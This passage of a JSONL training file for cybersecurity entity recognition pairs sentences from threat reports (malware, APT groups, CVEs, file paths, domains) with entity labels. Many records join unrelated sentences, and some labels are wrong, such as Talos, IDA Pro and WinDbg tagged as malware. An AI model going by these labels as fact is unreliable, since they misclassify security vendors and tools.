A clever example was ‘ Office Monkeys LOL Video.zip ’ .", "spans": {"MALWARE: Marcher": [[22, 29]], "MALWARE: Exobot": [[36, 42]], "TOOL: cloud storage services": [[246, 268]]}, "info": {"id": "cyberner_stix_train_002786", "source": "cyberner_stix_train"}} {"text": "WolfRAT is based on a previously leaked malware named DenDroid . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets ’ compromised systems . We first heard of this new campaign thanks to a Mastodon post by Randy McEoin .", "spans": {"MALWARE: WolfRAT": [[0, 7]], "MALWARE: DenDroid": [[54, 62]], "TOOL: unsophisticated malware": [[150, 173]], "TOOL: malicious shortcut": [[207, 225]], "MALWARE: .lnk": [[228, 232]], "TOOL: HTML help ( .chm ) files": [[273, 297]], "TOOL: Microsoft Office documents": [[303, 329]], "ORGANIZATION: Mastodon": [[581, 589]], "ORGANIZATION: Randy McEoin": [[598, 610]]}, "info": {"id": "cyberner_stix_train_002787", "source": "cyberner_stix_train"}} {"text": "An in-depth understanding of the “ Agent Smith ’ s campaign C & C infrastructure enabled us to reach the conclusion that the owner of “ i * * * e.com ” , “ h * * * g.com ” is the group of hackers behind “ Agent Smith ” . Without going too deep into the rabbit hole , there are several indicators pointing to an Iranian nexus , including language artifacts in the tool-marks used by the attacker , as well as network activity tying this actor to a very specific location that we have high confidence in not being spoofed . Furthermore , the tasks allow Dexphot to conveniently update the payload from the web every time the tasks run . 
We recommend following Microsoft ’s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": {"MALWARE: Agent Smith": [[35, 46], [205, 216]], "MALWARE: Dexphot": [[552, 559]]}, "info": {"id": "cyberner_stix_train_002788", "source": "cyberner_stix_train"}} {"text": "After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data . Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"MALWARE: Pony": [[48, 52]], "MALWARE: Vawtrak": [[57, 64]], "TOOL: Flash Player": [[133, 145]], "VULNERABILITY: exploit": [[146, 153]], "VULNERABILITY: CVE-2016-4117": [[156, 169]]}, "info": {"id": "cyberner_stix_train_002789", "source": "cyberner_stix_train"}} {"text": "We do not have detailed visibility into the specific host attacked , and have not been able to reproduce the second stage of the attack in our lab .", "spans": {}, "info": {"id": "cyberner_stix_train_002790", "source": "cyberner_stix_train"}} {"text": "Hoster : The sites hosting malware ; if malware is not directly attached to email , then macro enabled documents , malicious scripts , or exploit kits will pull payloads from these servers .", "spans": {"TOOL: email": [[76, 81]], "TOOL: macro": [[89, 94]]}, "info": {"id": "cyberner_stix_train_002791", "source": "cyberner_stix_train"}} {"text": "North Korea linked hackers are among the most prolific nation-state threats , targeting not only the U.S. and South Korea but the global financial system and nations worldwide . 
The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: financial": [[137, 146]], "ORGANIZATION: nations": [[158, 165]], "ORGANIZATION: government institutions": [[300, 323]], "ORGANIZATION: embassies": [[326, 335]], "ORGANIZATION: oil and gas industry": [[342, 362]], "ORGANIZATION: military contractors": [[384, 404]], "ORGANIZATION: activists": [[409, 418]]}, "info": {"id": "cyberner_stix_train_002792", "source": "cyberner_stix_train"}} {"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": {"THREAT_ACTOR: attacker": [[80, 88]], "TOOL: Triconex controller": [[101, 120]], "FILEPATH: documents": [[135, 144]], "VULNERABILITY: CVE-2017-0199": [[155, 168]]}, "info": {"id": "cyberner_stix_train_002793", "source": "cyberner_stix_train"}} {"text": "gop.com — used by the Republican National Committee , donaldjtrump.com — used by the Donald Trump campaign , johnkasich.com — used by the John Kasich campaign .", "spans": {"DOMAIN: gop.com": [[0, 7]], "ORGANIZATION: Republican National Committee": [[22, 51]], "DOMAIN: donaldjtrump.com": [[54, 70]], "DOMAIN: johnkasich.com": [[109, 123]]}, "info": {"id": "cyberner_stix_train_002794", "source": "cyberner_stix_train"}} {"text": "EventBot ’ s request to use accessibility services . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . 
In addition to the malware evolution , the actors also shifted from solely spear-phishing targets with attachments to also compromising legitimate websites to host malware .", "spans": {"MALWARE: Bemstour": [[53, 61]], "TOOL: DoublePulsar backdoor": [[115, 136]], "THREAT_ACTOR: actors": [[182, 188]]}, "info": {"id": "cyberner_stix_train_002795", "source": "cyberner_stix_train"}} {"text": "The library includes such operations as : Get address of cybercriminal C & C server Get configuration file with web injects from C & C , as well as default list of injects Scan for app package names that generated AccessibilityEvent events in the list of known banking/antivirus/other popular apps Set malware as default SMS app Get address of the phishing page that opens when the app runs , and others getStartWebUrl function – get address of phishing page The configuration file contains a list of injects for mobile banking apps – links to phishing pages matching the mobile McAfee Advanced Threat research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:Contacts an IP address / domain that was used to host a malicious document from a Lazarus previous campaign in 2017 . 
In this version , a shortcut is created in order to launch winnit.exe in the following path %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk .", "spans": {"ORGANIZATION: McAfee": [[579, 585]], "THREAT_ACTOR: Lazarus": [[643, 650], [798, 805]], "MALWARE: malicious document": [[772, 790]], "FILEPATH: winnit.exe": [[893, 903]], "FILEPATH: %USERPROFILE%\\Start Menu\\Programs\\Startup\\Anti virus service.lnk": [[926, 990]]}, "info": {"id": "cyberner_stix_train_002796", "source": "cyberner_stix_train"}} {"text": "These analysts were linked by their coverage of the telecommunications industry , making this targeting very similar to , and likely a continuation of , activity described in our “ In Pursuit of Optical Fibers and Troop Intel ” blog .", "spans": {}, "info": {"id": "cyberner_stix_train_002797", "source": "cyberner_stix_train"}} {"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"TOOL: Enfal malware": [[21, 34]], "MALWARE: Backdoor.APT.Pgift": [[77, 95]], "VULNERABILITY: CVE-2012-0158": [[226, 239]]}, "info": {"id": "cyberner_stix_train_002798", "source": "cyberner_stix_train"}} {"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding . 
Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": {"MALWARE: date string hardcoded": [[107, 128]], "TOOL: Bookworm sample": [[139, 154]], "THREAT_ACTOR: APT29": [[396, 401]]}, "info": {"id": "cyberner_stix_train_002799", "source": "cyberner_stix_train"}} {"text": "In the past , the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry , instead of storing it in the malware itself , so this code modularisation follows the same line of thinking .", "spans": {"THREAT_ACTOR: Sofacy": [[18, 24]], "MALWARE: AZZY backdoors": [[53, 67]], "TOOL: C&C": [[77, 80]]}, "info": {"id": "cyberner_stix_train_002801", "source": "cyberner_stix_train"}} {"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker ’ s interest in ASUS devices , which explains the victim file name that mentions “ ASUS ” . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence . Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe . Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"ORGANIZATION: ASUS": [[76, 80], [132, 136]], "THREAT_ACTOR: HIDDEN COBRA actors": [[208, 227]], "TOOL: FALLCHILL malware": [[240, 257]], "MALWARE: Quasar RAT": [[285, 295]], "FILEPATH: CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe": [[313, 368]]}, "info": {"id": "cyberner_stix_train_002802", "source": "cyberner_stix_train"}} {"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. 
government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . After the file is written, the malware moves on to process operations . There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: iOS": [[98, 101]], "THREAT_ACTOR: APT17": [[112, 117]], "THREAT_ACTOR: DeputyDog": [[134, 143]], "THREAT_ACTOR: threat group": [[163, 175]], "ORGANIZATION: FireEye Intelligence": [[181, 201]], "ORGANIZATION: government entities": [[258, 277]], "ORGANIZATION: defense industry": [[284, 300]], "ORGANIZATION: law firms": [[303, 312]], "ORGANIZATION: information technology companies": [[315, 347]], "ORGANIZATION: mining companies": [[350, 366]], "ORGANIZATION: non-government organizations": [[373, 401]], "ORGANIZATION: Harrison": [[518, 526]], "ORGANIZATION: Ashleymadisonsucks.com": [[563, 585]], "ORGANIZATION: Ashley Madison": [[633, 647]]}, "info": {"id": "cyberner_stix_train_002803", "source": "cyberner_stix_train"}} {"text": "Note there is a typo in the executable ’s filename ; Once the binary is executed , a password prompt dialog box opens .", "spans": {}, "info": {"id": "cyberner_stix_train_002804", "source": "cyberner_stix_train"}} {"text": "ALLCONTACTS – send all contacts from phone memory to C & C . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . 
This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": {"MALWARE: malicious files": [[101, 116]], "TOOL: iviewers.dll file": [[148, 165]], "TOOL: DLL load hijacking": [[179, 197]], "MALWARE: Fuzzbunch": [[272, 281]], "THREAT_ACTOR: Shadow Brokers": [[355, 369]]}, "info": {"id": "cyberner_stix_train_002805", "source": "cyberner_stix_train"}} {"text": "The code for this characteristic and the corresponding Twitter accounts can be seen in figures 3 and 4 respectively . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity . Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"ORGANIZATION: Twitter": [[55, 62]], "THREAT_ACTOR: cyber threat group": [[132, 150]], "ORGANIZATION: FireEye": [[159, 166]], "THREAT_ACTOR: threat": [[214, 220]], "THREAT_ACTOR: admin@338": [[269, 278]], "MALWARE: Glimpse": [[324, 331]]}, "info": {"id": "cyberner_stix_train_002806", "source": "cyberner_stix_train"}} {"text": "The c2 domain was associated with multiple IP addresses in past .", "spans": {"TOOL: c2": [[4, 6]]}, "info": {"id": "cyberner_stix_train_002807", "source": "cyberner_stix_train"}} {"text": "Although the campaign identifier itself doesn’t contain a date , we believe the campaign to have originated around the 7th of June 2009 , which was when the PinchDuke sample in question was compiled .", "spans": {"MALWARE: PinchDuke": [[157, 166]]}, "info": {"id": "cyberner_stix_train_002808", "source": "cyberner_stix_train"}} {"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to 
directly download additional modules and execute them in memory from the command and control ( C2 ) server . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"TOOL: Ham Backdoor": [[4, 16]], "THREAT_ACTOR: OceanLotus’": [[224, 235]], "ORGANIZATION: foreign governments": [[388, 407]], "ORGANIZATION: activists": [[410, 419]], "ORGANIZATION: dissidents": [[426, 436]]}, "info": {"id": "cyberner_stix_train_002809", "source": "cyberner_stix_train"}} {"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Value : %AppData%\\Video\\videodrv.exe .", "spans": {"FILEPATH: %AppData%\\Video\\videodrv.exe": [[74, 102]]}, "info": {"id": "cyberner_stix_train_002810", "source": "cyberner_stix_train"}} {"text": "We also found the actor ’s Telegram group on their fake website .", "spans": {"TOOL: Telegram": [[27, 35]]}, "info": {"id": "cyberner_stix_train_002811", "source": "cyberner_stix_train"}} {"text": "In this example , the requests to the server take the following form : Here , the “ operator ” query parameter is the Mobile Country Code and Mobile Network Code . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks . If the type of the object that the system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry . 
“ s1.txt ” , which likely contains the unauthorized MicroSCADA commands", "spans": {"ORGANIZATION: employees": [[293, 302], [435, 444]], "ORGANIZATION: social media": [[346, 358]], "MALWARE: ZxShell": [[632, 639]], "SYSTEM: windows": [[655, 662]]}, "info": {"id": "cyberner_stix_train_002812", "source": "cyberner_stix_train"}} {"text": "Conclusion Although not yet mature enough to provide the equivalent of a full-blown set of Android banking malware features ( such as RAT , RAT with ATS ( Automated Transaction Script ) , back-connect proxy , media streaming ) , or providing an exhaustive target list , Cerberus should not be taken lightly . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"SYSTEM: Android": [[91, 98]], "MALWARE: Cerberus": [[270, 278]], "THREAT_ACTOR: SectorJ04's": [[335, 346]], "THREAT_ACTOR: BRONZE BUTLER": [[517, 530]], "TOOL: emails": [[549, 555]], "TOOL: Flash": [[561, 566], [653, 658]], "MALWARE: Daserf": [[613, 619]], "MALWARE: malware": [[620, 627]], "VULNERABILITY: exploits": [[659, 667]]}, "info": {"id": "cyberner_stix_train_002813", "source": "cyberner_stix_train"}} {"text": "We speculate that this is an intermediate stage in significant changes to their macOS malware .", "spans": {"SYSTEM: macOS": [[80, 85]]}, "info": {"id": "cyberner_stix_train_002814", "source": "cyberner_stix_train"}} {"text": "The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization .", "spans": {"MALWARE: Shellbot": [[4, 12]], "SYSTEM: Unix-": [[90, 95]], "SYSTEM: Linux-based": [[100, 111]]}, "info": {"id": 
"cyberner_stix_train_002815", "source": "cyberner_stix_train"}} {"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan . So , we put our trust in software vendors that the files they distribute don’t include malware . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"TOOL: Emissary": [[301, 309]], "TOOL: Emissary Trojan": [[441, 456]], "ORGANIZATION: CrowdStrike researchers": [[556, 579]], "ORGANIZATION: Exchange systems": [[620, 636]]}, "info": {"id": "cyberner_stix_train_002816", "source": "cyberner_stix_train"}} {"text": "In the latest implant versions there are 48 different commands . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . 
MuddyWater : Seedworm , TEMP.Zagros .", "spans": {"THREAT_ACTOR: NewsBeef": [[69, 77]], "THREAT_ACTOR: MuddyWater": [[196, 206]], "THREAT_ACTOR: Seedworm": [[209, 217]], "THREAT_ACTOR: TEMP.Zagros": [[220, 231]]}, "info": {"id": "cyberner_stix_train_002817", "source": "cyberner_stix_train"}} {"text": "These attacks , which occurred in November 2016 and January 2017 , reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states .", "spans": {}, "info": {"id": "cyberner_stix_train_002818", "source": "cyberner_stix_train"}} {"text": "The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp S-MAL/Seduploader payloads , as discussed in Talos ’ blog .", "spans": {"MALWARE: SofacyCarberp S-MAL/Seduploader": [[99, 130]]}, "info": {"id": "cyberner_stix_train_002819", "source": "cyberner_stix_train"}} {"text": "If remote access between zones is an unavoidable business need , log and monitor these connections closely .", "spans": {}, "info": {"id": "cyberner_stix_train_002820", "source": "cyberner_stix_train"}} {"text": "Even stranger , each webpage contained the same content within the body .", "spans": {}, "info": {"id": "cyberner_stix_train_002821", "source": "cyberner_stix_train"}} {"text": "] today www [ . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez . These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family . We recommend following Microsoft ’s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": {"THREAT_ACTOR: Mofang": [[47, 53]], "MALWARE: Aumlib": [[230, 236]]}, "info": {"id": "cyberner_stix_train_002822", "source": "cyberner_stix_train"}} {"text": "As a result , information related to the malicious actor is tentatively redacted in this publication . 
We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . A cursory review of BlackOasis ’ espionage campaign suggests there is some overlap between the group ’s actions and Saudi Arabia ’s geopolitical interests . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": {"TOOL: Bookworm": [[146, 154]], "MALWARE: decoys documents": [[241, 257]], "TOOL: dynamic DNS domain": [[286, 304]], "THREAT_ACTOR: BlackOasis": [[405, 415]], "MALWARE: TYPEFRAME": [[549, 558]]}, "info": {"id": "cyberner_stix_train_002823", "source": "cyberner_stix_train"}} {"text": "Again , if a victim downloaded a torrent containing a wrapped executable , they would get infected with OnionDuke .", "spans": {"MALWARE: OnionDuke": [[104, 113]]}, "info": {"id": "cyberner_stix_train_002824", "source": "cyberner_stix_train"}} {"text": "For TA505 , the payloads have shifted over the years and months of their activity , but their sending and hosting infrastructure make these changes relatively simple to implement .", "spans": {"THREAT_ACTOR: TA505": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002825", "source": "cyberner_stix_train"}} {"text": "Lookout researchers have been tracking this threat for the last month . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure . Svchost.exe groups are identified in the above registry key . 
Fortunately , an artifact of its execution was discovered in the /private / var / db / oah directory .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "TOOL: WhiteBear": [[103, 112]], "FILEPATH: Svchost.exe": [[227, 238]]}, "info": {"id": "cyberner_stix_train_002826", "source": "cyberner_stix_train"}} {"text": "The Command & Control server also displays a favicon image which looks like a small orange ball . Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange . While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers . The network sees a high number of data access and transfer requests by the same user , who may be authorized , but does not regularly work with the targeted data assets and network resources .", "spans": {"ORGANIZATION: e-commerce companies": [[139, 159]], "ORGANIZATION: shipping company": [[177, 193]], "ORGANIZATION: financial organizations": [[220, 243]], "ORGANIZATION: IT firm": [[253, 260]], "MALWARE: backdoor": [[367, 375]]}, "info": {"id": "cyberner_stix_train_002827", "source": "cyberner_stix_train"}} {"text": "However , the apps are still available in third-party app stores . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . 
This version of KONNI is the most advanced with better coding .", "spans": {"ORGANIZATION: FireEye": [[67, 74]], "ORGANIZATION: APT40": [[83, 88]], "THREAT_ACTOR: TEMP.Periscope": [[156, 170]], "THREAT_ACTOR: Leviathan": [[173, 182]], "THREAT_ACTOR: TEMP.Jumper": [[187, 198]], "MALWARE: KONNI": [[217, 222]]}, "info": {"id": "cyberner_stix_train_002828", "source": "cyberner_stix_train"}} {"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": {"MALWARE: China Chopper": [[136, 149]], "VULNERABILITY: CVE-2015-0062": [[278, 291]], "VULNERABILITY: CVE-2015-1701": [[294, 307]], "VULNERABILITY: CVE-2016-0099": [[312, 325]], "THREAT_ACTOR: attacker": [[339, 347]], "THREAT_ACTOR: APT34": [[388, 393]], "MALWARE: public and non-public tools": [[408, 435]], "MALWARE: compromised accounts": [[487, 507]]}, "info": {"id": "cyberner_stix_train_002829", "source": "cyberner_stix_train"}} {"text": "The data that is sent in the POST is serialized with json , which is then is encrypted , and finally encoded in base64 .", "spans": {"TOOL: json": [[53, 57]]}, "info": {"id": "cyberner_stix_train_002830", "source": "cyberner_stix_train"}} {"text": "The loader and the SofacyCarberp sample delivered in this attack is similar to samples we have analyzed in the past but contains marked differences .", "spans": {"MALWARE: SofacyCarberp": [[19, 32]]}, "info": {"id": "cyberner_stix_train_002831", "source": "cyberner_stix_train"}} {"text": "Although 
Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups . Also , you may check MAC addresses online . StrifeWater is used to create a foothold in victim and environments , and it has various functions , including executing system commands , screen capturing , establishing persistence , listing system files , and downloading updates and additional modules .", "spans": {"MALWARE: Talos": [[9, 14]], "ORGANIZATION: FireEye": [[124, 131]], "THREAT_ACTOR: Moafee": [[221, 227]], "THREAT_ACTOR: DragonOK groups": [[232, 247]], "MALWARE: StrifeWater": [[294, 305]]}, "info": {"id": "cyberner_stix_train_002832", "source": "cyberner_stix_train"}} {"text": "” some_method ” , “ data ” :", "spans": {}, "info": {"id": "cyberner_stix_train_002833", "source": "cyberner_stix_train"}} {"text": "Figure 7 lists the IP addresses of these C2 servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye . The attacker implemented filtering based on the keyboard 's layout . 
We 'll delve into the recent four - month spike in attacks against the UK , the unsettling uptick in attacks on France 's government sector , and how Germany retained its spot as the fourth most targeted country in the world .", "spans": {"MALWARE: RuMMS": [[68, 73]], "TOOL: PowerShell backdoor": [[243, 262]], "TOOL: QUADAGENT": [[270, 279]], "THREAT_ACTOR: OilRig group": [[307, 319]], "ORGANIZATION: ClearSky Cyber Security": [[328, 351]], "ORGANIZATION: FireEye": [[356, 363]], "ORGANIZATION: UK": [[506, 508]], "ORGANIZATION: France 's government sector": [[547, 574]], "ORGANIZATION: Germany": [[585, 592]]}, "info": {"id": "cyberner_stix_train_002834", "source": "cyberner_stix_train"}} {"text": "The said screen is the ransom note , which contains threats and instructions to pay the ransom . Starting in mid-February . . The file path at the end of the configuration is used to store configuration data that is encrypted using AES-128 .", "spans": {}, "info": {"id": "cyberner_stix_train_002835", "source": "cyberner_stix_train"}} {"text": "DEFENSOR ID was released on Feb 3 , 2020 and last updated to v1.4 on May 6 , 2020 . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": {"MALWARE: DEFENSOR ID": [[0, 11]], "THREAT_ACTOR: SLUB": [[88, 92]], "VULNERABILITY: CVE-2018-8174": [[183, 196]], "VULNERABILITY: CVE-2019-0752": [[200, 213]], "THREAT_ACTOR: Lazarus Group": [[257, 270]], "MALWARE: PapaAlfa": [[349, 357]]}, "info": {"id": "cyberner_stix_train_002836", "source": "cyberner_stix_train"}} {"text": "This technique only works for unpatched devices running Android 4.3 or lower . 
Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan . One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 . ( Forbes , Gizmodo ) • Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over • Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos • New Threat Actor Launches Cyber - attacks on Ukraine and Poland •", "spans": {"SYSTEM: Android 4.3": [[56, 67]], "ORGANIZATION: Kaspersky Lab": [[88, 101]], "ORGANIZATION: Forbes": [[650, 656]], "ORGANIZATION: Gizmodo": [[659, 666]], "VULNERABILITY: Memory corruption vulnerability": [[695, 726]], "TOOL: Microsoft Edge": [[730, 744]], "SYSTEM: MilesightVPN": [[747, 759]], "TOOL: Malicious Microsoft Drivers": [[793, 820]], "ORGANIZATION: Cisco Talos": [[853, 864]], "THREAT_ACTOR: Cyber - attacks": [[893, 908]]}, "info": {"id": "cyberner_stix_train_002837", "source": "cyberner_stix_train"}} {"text": "Proofpoint wrote about the DroidJack RAT side-loaded with the Pokemon GO app back in July 2016 ; the difference here is that there is no game included in the malicious package . The admin@338 has targeted international media organizations in the past . Ironically , Ben-Gurion University is home to Israel ’s Cyber Security Research Center . 
So , if you get a bunch of messages from strangers , do n't click on the links , and do n’t click on any attachments .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: DroidJack RAT": [[27, 40]], "SYSTEM: Pokemon GO": [[62, 72]], "THREAT_ACTOR: admin@338": [[182, 191]], "ORGANIZATION: international media organizations": [[205, 238]], "ORGANIZATION: Ben-Gurion University": [[266, 287]], "ORGANIZATION: Israel ’s Cyber Security Research Center": [[299, 339]]}, "info": {"id": "cyberner_stix_train_002838", "source": "cyberner_stix_train"}} {"text": "As for the Ashas family , one of the associated promotional videos , “ Head Soccer World Champion 2018 – Android , ios ” was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": {"MALWARE: Ashas": [[11, 16]], "SYSTEM: Android": [[105, 112]], "SYSTEM: ios": [[115, 118]], "MALWARE: IDA Pro": [[253, 260]], "MALWARE: WinDbg": [[265, 271]], "FILEPATH: Anti virus service.lnk": [[400, 422]], "DOMAIN: dowhelsitjs.netau.net": [[425, 446]]}, "info": {"id": "cyberner_stix_train_002839", "source": "cyberner_stix_train"}} {"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! 
, Mail.ru , Passport.Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": {"MALWARE: PinchDuke": [[24, 33]], "TOOL: Bat!": [[104, 108]], "TOOL: Yahoo!": [[111, 117]], "DOMAIN: Mail.ru": [[120, 127]], "DOMAIN: Passport.Net": [[130, 142]], "TOOL: Google Talk": [[145, 156]], "TOOL: Netscape Navigator": [[159, 177]], "TOOL: Mozilla Firefox": [[180, 195]], "TOOL: Mozilla Thunderbird": [[198, 217]], "TOOL: Internet Explorer": [[220, 237]], "ORGANIZATION: Microsoft": [[240, 249]], "TOOL: Outlook": [[250, 257]], "TOOL: WinInet Credential Cache": [[260, 284]], "TOOL: Lightweight Directory Access Protocol": [[287, 324]], "TOOL: LDAP": [[327, 331]]}, "info": {"id": "cyberner_stix_train_002841", "source": "cyberner_stix_train"}} {"text": "This second group is an Arabic-speaking group that mainly targets the Middle East and North Africa , with a few targets in European and Asian countries as well .", "spans": {}, "info": {"id": "cyberner_stix_train_002842", "source": "cyberner_stix_train"}} {"text": "The cdnver.dll payload installed by the loader executable is a variant of the SofacyCarberp payload , which is used extensively by the Sofacy threat group .", "spans": {"FILEPATH: cdnver.dll": [[4, 14]], "MALWARE: SofacyCarberp": [[78, 91]], "THREAT_ACTOR: Sofacy": [[135, 141]]}, "info": {"id": "cyberner_stix_train_002843", "source": "cyberner_stix_train"}} {"text": "saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot . 
However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": {"ORGANIZATION: CTU": [[319, 322]], "THREAT_ACTOR: GOLD LOWELL": [[347, 358]], "ORGANIZATION: ASERT": [[489, 494]], "ORGANIZATION: academic institutions": [[608, 629]]}, "info": {"id": "cyberner_stix_train_002844", "source": "cyberner_stix_train"}} {"text": "This vulnerability was disclosed and patched days prior to this attack .", "spans": {}, "info": {"id": "cyberner_stix_train_002845", "source": "cyberner_stix_train"}} {"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines . 